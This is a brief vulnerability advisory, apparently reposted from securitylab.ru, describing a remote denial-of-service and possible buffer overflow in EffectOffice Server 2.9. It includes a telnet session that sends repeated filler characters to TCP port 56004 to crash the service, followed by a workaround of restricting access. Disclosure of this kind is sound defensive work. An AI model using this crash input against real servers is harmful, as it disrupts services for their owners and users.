[securitylab.ru] EffectOffice Server 2.9 problem
Application: EffectOffice Server 2.9
Vendor: EffectOffice
Vendor Site: http://www.EffectOffice.com
Remote: Yes
Exploitable: Yes
Risk level: High
Authors: D_BuG (d_bug @ bk.ru)
Authors Site: http://www.securitylab.ru
Description:
A vulnerability identified in EffectOffice can be exploited by a
malicious person to cause a Denial of Service and under specific
condition can lead to buffer overflow with possibility of remote code
execution.
Remote user could send a specially crafted data to 56004 TCP port on
target server to potentially cause the system to crash.
Exploit:
hacker# telnet
telnet open
(to) attackhost 56004
Trying attackhost......
Connected to attackhost.
Escape character is '^]'.
aaaaaaaaaa
aaaaaaaaaa
aaaaaaaaaa
aaaaaaaaaa
^]
telnetclose
telnetquit
hacker#
...
Crash service
Workaround: Restrict access to the service allowing only connection
attempts from trusted IPs if possible.